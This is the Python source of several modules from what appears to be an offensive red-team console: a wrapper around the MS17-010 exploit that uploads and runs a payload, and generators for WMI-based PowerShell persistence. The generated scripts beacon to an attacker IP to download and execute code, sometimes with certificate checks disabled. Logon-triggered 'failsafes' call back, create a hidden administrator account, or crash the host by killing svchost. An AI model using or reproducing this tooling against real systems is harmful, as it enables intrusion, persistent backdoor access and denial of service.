class create:
    """Skeleton module showing the attributes the console expects.

    ``info`` is the README text, ``option_list`` names every settable
    option, and each option is a ``setting(name, value, required,
    description)``.  ``run()`` is the entry point; option values reach it
    as unchecked strings.
    """

    # Free-form README shown when someone asks for this module's info.
    info = '''
    This is an info piece.  It will display whenever someone checks the info of this module
    Consider it a small README
    '''

    # Every option that can be set from the console must appear here.
    option_list = ["option_a", "option_b", "option_c"]

    # One setting per option: setting(name, value, is_required, description).
    # Every option needs an initial value, even if it is "".  Keep the
    # description short; longer explanations belong in `info`.
    option_a = setting("option_a", "value_a", False, "value for option_a")
    option_b = setting("option_b", "", True, "value for option_b")
    option_c = setting("option_c", "value_c", False, "value for option_c")

    def __init__(self):
        # Name the console reports for this module.
        self.name = "my_module_name"

    def run(self):
        """Module entry point: echo the option values that were supplied.

        The console does not validate option values and passes them as
        strings, so any checking belongs at the top of this method.
        """
        print("These are the options I was passed and can use.")
        for option in (self.option_a, self.option_b, self.option_c):
            print(option.value)
class create:
    """Console wrapper around sleepya's MS17-010 exploit (dragonfire port)."""

    # README shown by the console.
    info = '''
    MS17-010 exploit for Windows 2000 and later by sleepya

    DRAGONFIRE: altered system call to upload and execute specified file, converted for dragonfire.

    Note:
    - The exploit should never crash a target (chance should be nearly 0%)
    - Named pipe is needed
    - Upload name is hard coded, might require changes to blend

    Tested on:
    - Windows 2016 x64
    - Windows 10 Pro Build 10240 x64
    - Windows 2012 R2 x64
    - Windows 8.1 x64
    - Windows 2008 R2 SP1 x64
    - Windows 7 SP1 x64
    - Windows 2008 SP1 x64
    - Windows 2003 R2 SP2 x64
    - Windows XP SP2 x64
    - Windows 8.1 x86
    - Windows 7 SP1 x86
    - Windows 2008 SP1 x86
    - Windows 2003 SP2 x86
    - Windows XP SP3 x86
    - Windows 2000 SP4 x86
    '''

    # Every option the console may set.
    option_list = ["target", "payload", "pipe_name"]

    # setting(name, value, is_required, description); values arrive as strings.
    target = setting("target", "192.168.0.0", True, "Target IP address")
    payload = setting("payload", "/payloads/payload.exe", True, "Payload to upload")
    pipe_name = setting("pipe_name", "", False, "browser, spoolss, netlogon, lsarpc, samr")

    def __init__(self):
        # Name the console reports for this module.
        self.name = "ms17-10"

    def run(self):
        """Hand the configured target, pipe and payload to exploit()."""
        pipe_name = self.pipe_name.value
        # An empty pipe_name means "let exploit() choose"; pass None, not "".
        if not pipe_name:
            pipe_name = None
        exploit(self.target.value, pipe_name, self.payload.value)
        # NOTE(review): nothing returned by exploit() is checked here, so this
        # banner prints whether or not the upload/execute actually succeeded.
        print('Own the Net!')
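class create:
    """Generate a PowerShell script that installs a WMI-subscription beaconer.

    The generated script creates an ``__EventFilter`` (a timer built on
    ``Win32_LocalTime``), a ``CommandLineEventConsumer`` that launches
    PowerShell to download-and-execute from ``ip:port/path``, and the
    ``__FilterToConsumerBinding`` joining them.  A matching removal
    script is produced alongside it.
    """

    # Menu printed when beacon_interval is missing or out of range.  Kept in
    # step with the range check in run() (0..5).
    beacon_settings = '''
    Beacon_Interval: How often you want the beacon.  Select a number from the list below.
    0 -- Every 15 Seconds
    1 -- Every Minute
    2 -- Every 15 Minutes
    3 -- Every 30 Minutes
    4 -- Every 1 Hour
    5 -- Every 4 Hours
    '''

    # README shown by the console.
    info = '''
    This module will build a script for the creation of the WMI objects required to install a WMI based windows beaconer.

    Settings:
    IP:  The IP address you want the beaconer to beacon to.
    PORT: The port to use.
    PATH: The name or path to the payload file on your web server.
    Filter: Name of the WMI filter.
    Consumer: Name of the WMI consumer.
    OutputFile: Filename of the locally generated file.
    use_ssl: 'yes' to fetch over https, 'no' for http.  NOTE: 'yes' disables certificate
             validation on the target (ServerCertificateValidationCallback = {$true}), so any
             server that can intercept the callback can serve the beacon its script.
    Beacon_Interval: How often you want the beacon.  Enter a number from the list below.  Anything else will cause the module to exit.
    0 -- Every 15 Seconds
    1 -- Every Minute
    2 -- Every 15 Minutes
    3 -- Every 30 Minutes
    4 -- Every 1 Hour
    5 -- Every 4 Hours

    Once the payload has been generated, either copy and paste the commands into a system level powershell, or download via a powershell download and execute.
    '''

    # Every option the console may set.
    option_list = ["ip", "port", "path", "filter", "consumer", "output_file", "beacon_interval", "use_ssl"]

    # setting(name, value, is_required, description); values arrive as strings.
    ip = setting("ip", "1.1.1.1", True, "beacon ip address")
    port = setting("port", "8080", True, "beacon port")
    path = setting("path", "index.html", True, "path to download file on server")
    use_ssl = setting("use_ssl", "no", True, "use SSL for callback?")
    filter = setting("filter", "", True, "name of WMI filter")
    consumer = setting("consumer", "", True, "name of WMI consumer")
    output_file = setting("output_file", "", False, "local output filename")
    beacon_interval = setting("beacon_interval", "", True, "beacon interval...see info for options")

    def __init__(self):
        # Name the console reports for this module.
        self.name = "powerbeacon"

    def run(self):
        """Render the install script and its removal twin.

        Validates beacon_interval (0..5), the filter/consumer names and
        use_ssl, then either prints both scripts or writes them to
        ``output/<output_file>`` and ``output/<output_file>_remove``.
        Returns None; all feedback is printed.
        """
        ip = self.ip.value
        port = self.port.value
        path = self.path.value
        filter_name = self.filter.value
        consumer_name = self.consumer.value
        output = self.output_file.value
        use_ssl = self.use_ssl.value

        # Options are unchecked strings; int() is the only parse that can fail.
        try:
            interval = int(self.beacon_interval.value)
        except (ValueError, TypeError):
            print("Invalid beacon_interval...")
            print(self.beacon_settings)
            return
        if interval < 0 or interval > 5:
            print("Invalid beacon_interval...")
            print(self.beacon_settings)
            return

        # Names are pasted verbatim into PowerShell strings and WMI object
        # paths; a quote character would break both the install and the
        # removal script.
        for label, name in (("filter", filter_name), ("consumer", consumer_name)):
            if "'" in name or '"' in name:
                print("%s must not contain quote characters" % label)
                return

        # Timer query for each interval.  All variants poll Win32_LocalTime.
        # NOTE(review): WITHIN 10 is a polling interval, so whether the
        # Second=0 conditions fire on every cycle depends on poll alignment --
        # confirm the timing on a test host before relying on it.
        wql_prefix = ("SELECT * FROM __InstanceModificationEvent WITHIN 10 "
                      "WHERE TargetInstance ISA 'Win32_LocalTime' AND ")
        conditions = {
            0: "(TargetInstance.Second=0 OR TargetInstance.Second=15 OR TargetInstance.Second=30 OR TargetInstance.Second=45)",
            1: "TargetInstance.Second=0",
            2: "(TargetInstance.Minute=1 OR TargetInstance.Minute=15 OR TargetInstance.Minute=30 OR TargetInstance.Minute=45) AND TargetInstance.Second=0",
            3: "(TargetInstance.Minute=1 OR TargetInstance.Minute=30) AND TargetInstance.Second=0",
            4: "(TargetInstance.Minute=1) AND TargetInstance.Second=0",
            5: "(TargetInstance.Hour=0 OR TargetInstance.Hour=4 OR TargetInstance.Hour=8 OR TargetInstance.Hour=12 OR TargetInstance.Hour=16 OR TargetInstance.Hour=20) AND TargetInstance.Minute=1 AND TargetInstance.Second=0",
        }
        interval_setting = '$instanceFilter.Query = "%s%s"' % (wql_prefix, conditions[interval])

        address = ip + ":" + port + "/" + path
        if use_ssl == "no":
            # Plain download-and-execute; the template keeps its own quotes
            # because it is pasted unquoted into CommandLineTemplate.
            messageblock = "\"powershell -command `\"iex(New-Object Net.WebClient).DownloadString('http://%s')`\"\"" % address
        elif use_ssl == "yes":
            # ServerCertificateValidationCallback = {$true} turns off TLS
            # certificate checking on the target, so the beacon trusts whoever
            # answers on this address.  Encoded (-e) because the one-liner
            # contains characters that are awkward inside the template.
            stager = "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};iex(New-Object Net.WebClient).DownloadString('https://%s')" % address
            # .decode() keeps this a str on Python 3 (b64encode returns bytes,
            # which would otherwise render as b'...' inside the script).
            encoded = b64encode(stager.encode('UTF-16LE')).decode('ascii')
            messageblock = "\"powershell -e %s \"" % encoded
        else:
            print("use_ssl must be either 'yes' or 'no'")
            return

        data = '''
$instanceFilter = ([wmiclass]"\\\.\\root\subscription:__EventFilter").CreateInstance()
$instanceFilter.QueryLanguage = "WQL"
%s
$instanceFilter.Name = "%s"
$instanceFilter.EventNamespace = 'root\cimv2'
$result = $instanceFilter.Put()
$newFilter = $result.Path

$instanceConsumer = ([wmiclass]"\\\.\\root\subscription:CommandLineEventConsumer").CreateInstance()
$instanceConsumer.Name = '%s'
$instanceConsumer.CommandLineTemplate = %s
$result = $instanceConsumer.Put()
$newConsumer = $result.Path

$instanceBinding = ([wmiclass]"\\\.\\root\subscription:__FilterToConsumerBinding").CreateInstance()
$instanceBinding.Filter = $newFilter
$instanceBinding.Consumer = $newConsumer
$result = $instanceBinding.Put()
$newBinding = $result.Path
''' % (interval_setting, filter_name, consumer_name, messageblock)

        # Removal deletes the three objects by path.  The binding path quotes
        # the consumer and filter paths, hence the heavy escaping.
        remove_data = '''
$x="\\\.\\root\subscription:__EventFilter.Name='%s'"
([wmi]$x).Delete()
$x="\\\.\\root\subscription:CommandLineEventConsumer.Name='%s'"
([wmi]$x).Delete()
$x='\\\.\\root\subscription:__FilterToConsumerBinding.Consumer="\\\\\\\\.\\\\root\\\\subscription:CommandLineEventConsumer.Name=\\"%s\\"",Filter="\\\\\\\\.\\\\root\\\\subscription:__EventFilter.Name=\\"%s\\""'
([wmi]$x).Delete()
''' % (filter_name, consumer_name, consumer_name, filter_name)

        if output == '':
            print(data)
            print("\n")
            print("To Remove")
            print("---------------------------------")
            print(remove_data)
            return

        # Both files land under output/ next to the console.
        output = "output/" + output
        with open(output, 'w') as f:
            f.write(data)
        with open(output + "_remove", 'w') as f:
            f.write(remove_data)
        print("Files have been written...")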
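class create:
    """Generate a WMI "failsafe" that calls back after a chosen failed logon.

    The generated script enables Logon failure auditing, then installs an
    ``__EventFilter`` on Security event 4625, a ``CommandLineEventConsumer``
    that re-reads the newest 4625 entry, greps it for ``FailName`` and
    download-and-executes ``callback_file`` from the hex IP that follows the
    ``@`` in the failed user name, plus the binding between them.  A removal
    script is produced alongside it.
    """

    # README shown by the console.
    info = '''
    This is the failsafe for windows persistence module.  After installing on a target, failing to login with 'FailName' performs a callback to a specified IP.

    Once the payload has been generated, either copy and paste the commands into a system level powershell, or download via a powershell download and execute.

    Ex: winexe -U user%password //192.168.0.100 "powershell -c iex(New-Object Net.WebClient).DownloadString('http://192.168.0.136:8080/failsafe')"

    #FAIL TO LOGIN
    #After installed, fail to login with FailName@[CALLBACK_IP] example is for 127.0.0.1
    winexe -U FailName@7F000001%password //192.168.0.100

    Notes:
    - The WMI filter fires on every 4625 (failed logon); the FailName test happens in the
      consumer, so every failed logon on the host launches powershell + wevtutil.
    - findstr matches substrings, so pick a FailName that cannot occur inside legitimate
      account names.
    - Install turns Logon failure auditing ON.  With reset_auditpol=yes the remove script sets
      it to disabled; it does not restore whatever policy the host had before.
    - use_ssl=yes disables certificate validation on the target
      (ServerCertificateValidationCallback = {$true}); anyone who can intercept the callback can
      serve the script.
    '''

    # Every option the console may set.
    option_list = [
        "FailName", "callback_port", "callback_file", "filter", "consumer",
        "reset_auditpol", "use_ssl", "output_file"
    ]

    # setting(name, value, is_required, description); values arrive as strings.
    FailName = setting("FailName", "", True, "Name to fail logon")
    filter = setting("filter", "ServiceFilter", True, "name of WMI filter")
    consumer = setting("consumer", "ServiceConsumer", True, "name of WMI consumer")
    callback_port = setting("callback_port", "4444", True, "Callback Port")
    callback_file = setting("callback_file", "", True, "Powershell file to get after failed login")
    reset_auditpol = setting(
        "reset_auditpol", "yes", True,
        "Upon uninstall, reset auditpolicy to NOT log failures?")
    use_ssl = setting("use_ssl", "no", True, "Set to 'yes' if you want to use SSL")
    output_file = setting("output_file", "", False, "local output filename")

    def __init__(self):
        # Name the console reports for this module.
        self.name = "powerbeacon"

    def run(self):
        """Render the install script and its removal twin.

        Validates the yes/no switches first, then either prints both
        scripts or writes them to ``output/<output_file>`` and
        ``output/<output_file>_remove``.  Returns None.
        """
        FailName = self.FailName.value
        filter_name = self.filter.value
        consumer_name = self.consumer.value
        output = self.output_file.value
        callback_port = self.callback_port.value
        callback_file = self.callback_file.value
        reset_auditpol = self.reset_auditpol.value
        use_ssl = self.use_ssl.value

        # Options are unchecked strings; reject bad switches before building.
        if reset_auditpol not in ("yes", "no"):
            print("reset_auditpol must be 'yes' or 'no'")
            return
        if use_ssl not in ("yes", "no"):
            print("use_ssl must be either yes or no")
            return

        # The newest 4625 entry is read twice on the target: once to test for
        # FailName, once to pull the hex callback address after the '@'.
        last_failure = ("wevtutil qe security /rd:true /f:text /c:1 /q:\"*[System/EventID=4625]\" | findstr /i %s"
                        % FailName)
        if use_ssl == "yes":
            scheme = "https"
            # Disables TLS certificate checking on the target.
            tls_bypass = "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
        else:
            scheme = "http"
            tls_bypass = ""
        messageblock = ("if(%s){$x=(%s).split('@');%siex(New-Object Net.WebClient).DownloadString('%s://0x'+$x[1]+':%s/%s')}"
                        % (last_failure, last_failure, tls_bypass, scheme, callback_port, callback_file))
        # .decode() keeps this a str on Python 3 (b64encode returns bytes).
        encodedmessage = b64encode(messageblock.encode('UTF-16LE')).decode('ascii')

        data = '''
auditpol /set /subcategory:"Logon" /success:enable /failure:enable
$instanceFilter = ([wmiclass]"\\\.\\root\subscription:__EventFilter").CreateInstance()
$instanceFilter.QueryLanguage = "WQL"
$instanceFilter.Query ="select * from __InstanceCreationEvent where TargetInstance isa 'Win32_NtLogEvent' and TargetInstance.logfile = 'Security' and (TargetInstance.EventCode = '4625')"
$instanceFilter.Name = "%s"
$instanceFilter.EventNamespace = 'root\cimv2'
$result = $instanceFilter.Put()
$newFilter = $result.Path

$instanceConsumer = ([wmiclass]"\\\.\\root\subscription:CommandLineEventConsumer").CreateInstance()
$instanceConsumer.Name = '%s'
$instanceConsumer.CommandLineTemplate = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\powershell.exe -c "if(wevtutil qe security /rd:true /f:text /c:1 /q:`"*[System/EventID=4625]`" | findstr /i %s){powershell -e %s}"'
$result = $instanceConsumer.Put()
$newConsumer = $result.Path

$instanceBinding = ([wmiclass]"\\\.\\root\subscription:__FilterToConsumerBinding").CreateInstance()
$instanceBinding.Filter = $newFilter
$instanceBinding.Consumer = $newConsumer
$result = $instanceBinding.Put()
$newBinding = $result.Path
''' % (filter_name, consumer_name, FailName, encodedmessage)

        remove_data = ''
        if reset_auditpol == "yes":
            # Sets a fixed policy; it does not restore the pre-install state.
            remove_data = '''
auditpol /set /subcategory:"Logon" /success:enable /failure:disable
'''
        # Delete the three WMI objects by path; the binding path embeds the
        # quoted consumer and filter paths, hence the heavy escaping.
        remove_data += '''
$x="\\\.\\root\subscription:__EventFilter.Name='%s'"
([wmi]$x).Delete()
$x="\\\.\\root\subscription:CommandLineEventConsumer.Name='%s'"
([wmi]$x).Delete()
$x='\\\.\\root\subscription:__FilterToConsumerBinding.Consumer="\\\\\\\\.\\\\root\\\\subscription:CommandLineEventConsumer.Name=\\"%s\\"",Filter="\\\\\\\\.\\\\root\\\\subscription:__EventFilter.Name=\\"%s\\""'
([wmi]$x).Delete()
''' % (filter_name, consumer_name, consumer_name, filter_name)

        if output == '':
            print(data)
            print("\n")
            print("To Remove")
            print("---------------------------------")
            print(remove_data)
            return

        # Both files land under output/ next to the console.
        output = "output/" + output
        with open(output, 'w') as f:
            f.write(data)
        with open(output + "_remove", 'w') as f:
            f.write(remove_data)
        print("Files have been written...")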
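class create:
    """Generate a WMI "failsafe" that creates a local admin after a chosen failed logon.

    The generated script enables Logon failure auditing, installs an
    ``__EventFilter`` on Security event 4625 and a
    ``CommandLineEventConsumer`` that, when the newest 4625 entry mentions
    ``FailName``, runs ``net users <CreateName> <password> /add`` and adds
    the account to the local Administrators group.  A removal script is
    produced alongside it.
    """

    # README shown by the console.
    info = '''
    This is the failsafe for windows persistence module.  After installing on a target, failing to login with 'FailName' will create an admin account called "CreateName"

    Once the payload has been generated, either copy and paste the commands into a system level powershell, or download via a powershell download and execute.

    Ex: winexe -U user%password //192.168.0.100 "powershell -c iex(New-Object Net.WebClient).DownloadString('http://192.168.0.136:8080/persist')"

    Notes:
    - The password is embedded in the consumer's CommandLineTemplate, so it is stored in clear
      text in the WMI repository for as long as the consumer exists.
    - CreateName and password are pasted unquoted into a cmd /c line; whitespace, quotes and
      cmd metacharacters are rejected by this module.
    - The WMI filter fires on every 4625 (failed logon); findstr matches substrings, so pick a
      FailName that cannot occur inside legitimate account names.
    - Install turns Logon failure auditing ON.  With reset_auditpol=yes (the default) the remove
      script sets it to disabled; it does not restore the pre-install policy.
    '''

    # Every option the console may set.
    option_list = [
        "FailName", "CreateName", "password", "filter", "consumer",
        "reset_auditpol", "output_file"
    ]

    # setting(name, value, is_required, description); values arrive as strings.
    FailName = setting("FailName", "", True, "Name to fail logon")
    CreateName = setting("CreateName", "", True, "New Username to add")
    password = setting("password", "password", True, "PW for new user")
    filter = setting("filter", "ServiceFilter", True, "name of WMI filter")
    consumer = setting("consumer", "ServiceConsumer", True, "name of WMI consumer")
    reset_auditpol = setting("reset_auditpol", "yes", True, "reset auditpol on removal?")
    output_file = setting("output_file", "", False, "local output filename")

    def __init__(self):
        # Name the console reports for this module.
        self.name = "powerbeacon"

    def run(self):
        """Render the install script and its removal twin.

        Validates reset_auditpol and the account values first, then either
        prints both scripts or writes them to ``output/<output_file>`` and
        ``output/<output_file>_remove``.  Returns None.
        """
        FailName = self.FailName.value
        password = self.password.value
        CreateName = self.CreateName.value
        filter_name = self.filter.value
        consumer_name = self.consumer.value
        output = self.output_file.value
        reset_auditpol = self.reset_auditpol.value

        # Options are unchecked strings; reject bad values before building.
        if reset_auditpol not in ("yes", "no"):
            print("reset_auditpol must be 'yes' or 'no'")
            return
        # These land unquoted inside `cmd /c net users NAME PASS /add`, wrapped
        # in a PowerShell -c "..." inside a single-quoted template: whitespace
        # splits the arguments and quotes or cmd metacharacters break the line.
        unsafe = set(" \t\"'&|<>^%")
        for label, value in (("CreateName", CreateName), ("password", password)):
            if any(ch in unsafe for ch in value):
                print("%s must not contain whitespace, quotes or cmd metacharacters" % label)
                return

        data = '''
auditpol /set /subcategory:"Logon" /success:enable /failure:enable
$instanceFilter = ([wmiclass]"\\\.\\root\subscription:__EventFilter").CreateInstance()
$instanceFilter.QueryLanguage = "WQL"
$instanceFilter.Query ="select * from __InstanceCreationEvent where TargetInstance isa 'Win32_NtLogEvent' and TargetInstance.logfile = 'Security' and (TargetInstance.EventCode = '4625')"
$instanceFilter.Name = "%s"
$instanceFilter.EventNamespace = 'root\cimv2'
$result = $instanceFilter.Put()
$newFilter = $result.Path

$instanceConsumer = ([wmiclass]"\\\.\\root\subscription:CommandLineEventConsumer").CreateInstance()
$instanceConsumer.Name = '%s'
$instanceConsumer.CommandLineTemplate = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\powershell.exe -c "if(wevtutil qe security /rd:true /f:text /c:1 /q:`"*[System/EventID=4625]`" | findstr /i %s){cmd /c net users %s %s /add `&`& net localgroup administrators %s /add}"'
$result = $instanceConsumer.Put()
$newConsumer = $result.Path

$instanceBinding = ([wmiclass]"\\\.\\root\subscription:__FilterToConsumerBinding").CreateInstance()
$instanceBinding.Filter = $newFilter
$instanceBinding.Consumer = $newConsumer
$result = $instanceBinding.Put()
$newBinding = $result.Path
''' % (filter_name, consumer_name, FailName, CreateName, password, CreateName)

        remove_data = ''
        if reset_auditpol == "yes":
            # Sets a fixed policy; it does not restore the pre-install state.
            remove_data = '\nauditpol /set /subcategory:"Logon" /success:enable /failure:disable'
        # Remove the account, then delete the three WMI objects by path; the
        # binding path embeds the quoted consumer and filter paths.
        remove_data += '''
net users %s /delete
$x="\\\.\\root\subscription:__EventFilter.Name='%s'"
([wmi]$x).Delete()
$x="\\\.\\root\subscription:CommandLineEventConsumer.Name='%s'"
([wmi]$x).Delete()
$x='\\\.\\root\subscription:__FilterToConsumerBinding.Consumer="\\\\\\\\.\\\\root\\\\subscription:CommandLineEventConsumer.Name=\\"%s\\"",Filter="\\\\\\\\.\\\\root\\\\subscription:__EventFilter.Name=\\"%s\\""'
([wmi]$x).Delete()
''' % (CreateName, filter_name, consumer_name, consumer_name, filter_name)

        if output == '':
            print(data)
            print("\n")
            print("To Remove")
            print("---------------------------------")
            print(remove_data)
            return

        # Both files land under output/ next to the console.
        output = "output/" + output
        with open(output, 'w') as f:
            f.write(data)
        with open(output + "_remove", 'w') as f:
            f.write(remove_data)
        print("Files have been written...")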
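class create:
    """Generate a WMI "failsafe" that kills svchost after a chosen failed logon.

    The generated script enables Logon failure auditing, installs an
    ``__EventFilter`` on Security event 4625 and a
    ``CommandLineEventConsumer`` that, when the newest 4625 entry mentions
    ``FailName``, runs an encoded PowerShell command (UTF-16LE/base64 of
    ``wmic process where name=`'svchost.exe`' delete``), which takes the
    host down.  A removal script is produced alongside it.
    """

    # README shown by the console.
    info = '''
    This module creates a WMI filter where failing to logon with 'FailName' crashes the box by deleting running instances of svchost.

    Once the payload has been generated, either copy and paste the commands into a system level powershell, or download via a powershell download and execute.

    Ex: winexe -U user%password //192.168.0.100 "powershell -c iex(New-Object Net.WebClient).DownloadString('http://192.168.0.136:8080/persist')"

    Notes:
    - This is destructive: the consumer deletes every svchost.exe process.  Treat any trigger
      as a deliberate denial of service of the host.
    - The WMI filter fires on every 4625 (failed logon); findstr matches substrings, so pick a
      FailName that cannot occur inside legitimate account names.
    - Install turns Logon failure auditing ON.  With reset_auditpol=yes the remove script sets
      it to disabled; it does not restore the pre-install policy.
    '''

    # Every option the console may set.
    option_list = ["FailName", "filter", "consumer", "output_file", "reset_auditpol"]

    # setting(name, value, is_required, description); values arrive as strings.
    FailName = setting("FailName", "", True, "Name to fail logon")
    filter = setting("filter", "ServiceFilter", True, "name of WMI filter")
    consumer = setting("consumer", "ServiceConsumer", True, "name of WMI consumer")
    output_file = setting("output_file", "", False, "local output filename")
    reset_auditpol = setting("reset_auditpol", "yes", True, "reset auditpol on removal?")

    def __init__(self):
        # Name the console reports for this module.
        self.name = "powerbeacon"

    def run(self):
        """Render the install script and its removal twin.

        Validates reset_auditpol first, then either prints both scripts or
        writes them to ``output/<output_file>`` and
        ``output/<output_file>_remove``.  Returns None.
        """
        FailName = self.FailName.value
        filter_name = self.filter.value
        consumer_name = self.consumer.value
        output = self.output_file.value
        reset_auditpol = self.reset_auditpol.value

        # Options are unchecked strings; reject a bad switch before building.
        if reset_auditpol not in ("yes", "no"):
            print("Enter 'yes' or 'no' for 'reset_auditpol'")
            return

        # The -e blob is the UTF-16LE/base64 encoding of
        #   wmic process where name=`'svchost.exe`' delete
        data = '''
auditpol /set /subcategory:"Logon" /success:enable /failure:enable
$instanceFilter = ([wmiclass]"\\\.\\root\subscription:__EventFilter").CreateInstance()
$instanceFilter.QueryLanguage = "WQL"
$instanceFilter.Query ="select * from __InstanceCreationEvent where TargetInstance isa 'Win32_NtLogEvent' and TargetInstance.logfile = 'Security' and (TargetInstance.EventCode = '4625')"
$instanceFilter.Name = "%s"
$instanceFilter.EventNamespace = 'root\cimv2'
$result = $instanceFilter.Put()
$newFilter = $result.Path

$instanceConsumer = ([wmiclass]"\\\.\\root\subscription:CommandLineEventConsumer").CreateInstance()
$instanceConsumer.Name = '%s'
$instanceConsumer.CommandLineTemplate = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\powershell.exe -c "if(wevtutil qe security /rd:true /f:text /c:1 /q:`"*[System/EventID=4625]`" | findstr /i %s){powershell -e dwBtAGkAYwAgAHAAcgBvAGMAZQBzAHMAIAB3AGgAZQByAGUAIABuAGEAbQBlAD0AYAAnAHMAdgBjAGgAbwBzAHQALgBlAHgAZQBgACcAIABkAGUAbABlAHQAZQA=}"'
$result = $instanceConsumer.Put()
$newConsumer = $result.Path

$instanceBinding = ([wmiclass]"\\\.\\root\subscription:__FilterToConsumerBinding").CreateInstance()
$instanceBinding.Filter = $newFilter
$instanceBinding.Consumer = $newConsumer
$result = $instanceBinding.Put()
$newBinding = $result.Path
''' % (filter_name, consumer_name, FailName)

        # Delete the three WMI objects by path; the binding path embeds the
        # quoted consumer and filter paths, hence the heavy escaping.
        remove_data = '''
$x="\\\.\\root\subscription:__EventFilter.Name='%s'"
([wmi]$x).Delete()
$x="\\\.\\root\subscription:CommandLineEventConsumer.Name='%s'"
([wmi]$x).Delete()
$x='\\\.\\root\subscription:__FilterToConsumerBinding.Consumer="\\\\\\\\.\\\\root\\\\subscription:CommandLineEventConsumer.Name=\\"%s\\"",Filter="\\\\\\\\.\\\\root\\\\subscription:__EventFilter.Name=\\"%s\\""'
([wmi]$x).Delete()
''' % (filter_name, consumer_name, consumer_name, filter_name)
        if reset_auditpol == "yes":
            # Sets a fixed policy; it does not restore the pre-install state.
            remove_data += "auditpol /set /subcategory:\"Logon\" /success:enable /failure:disable"

        if output == '':
            print(data)
            print("\n")
            print("To Remove")
            print("---------------------------------")
            print(remove_data)
            return

        # Both files land under output/ next to the console.
        output = "output/" + output
        with open(output, 'w') as f:
            f.write(data)
        with open(output + "_remove", 'w') as f:
            f.write(remove_data)
        print("Files have been written...")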